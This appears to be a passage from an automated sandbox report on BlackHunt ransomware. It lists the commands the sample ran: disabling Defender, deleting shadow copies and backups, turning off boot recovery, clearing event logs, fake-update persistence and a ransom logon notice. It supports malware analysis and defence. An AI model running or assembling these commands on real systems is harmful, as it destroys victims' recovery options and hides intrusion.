7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 41 PID 2984 wrote to memory of 2736 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 44 PID 2984 wrote to memory of 2736 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 44 PID 2984 wrote to memory of 2736 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 44 PID 2984 wrote to memory of 2736 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 44 PID 2984 wrote to memory of 2620 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 46 PID 2984 wrote to memory of 2620 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 46 PID 2984 wrote to memory of 2620 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 46 PID 2984 wrote to memory of 2620 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 46 PID 2984 wrote to memory of 2568 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 48 PID 2984 wrote to memory of 2568 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 48 PID 2984 wrote to memory of 2568 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 48 PID 2984 wrote to memory of 2568 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 48 PID 2984 wrote to memory of 2584 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 50 PID 2984 wrote to memory of 2584 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 50 PID 2984 wrote to memory of 2584 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 50 PID 2984 wrote to memory of 2584 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 50 PID 2984 wrote to memory of 2628 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 52 PID 2984 wrote to memory of 2628 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 52 PID 2984 wrote to memory of 2628 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 52 PID 2984 wrote to memory of 2628 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 52 PID 2820 wrote to memory of 2640 2820 cmd.exe 53 PID 2820 wrote to memory of 2640 2820 cmd.exe 53 PID 2820 wrote to memory of 2640 2820 cmd.exe 53 PID 2716 wrote to memory of 2236 2716 cmd.exe 54 PID 2716 wrote to memory of 2236 2716 cmd.exe 54 PID 2716 wrote to memory of 2236 2716 cmd.exe 54 PID 2984 wrote to memory of 2972 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 55 PID 2984 wrote to memory of 2972 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 55 PID 2984 wrote to memory of 2972 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 55 PID 2984 wrote to memory of 2972 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 55 PID 2984 wrote to memory of 2968 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 56 PID 2984 wrote to memory of 2968 2984 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2572
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2228
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2360
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1056
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2552
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F2⤵PID:2500
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1744
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1828
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1092
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:936
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1808
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2452
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1688
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1680
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2308
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1552
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3912
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3472
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:308
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1984
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3648
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1400
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:764
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1580
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:564
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1748
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1136
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3696
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3124
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3748
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3792
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1324
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3552
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
-
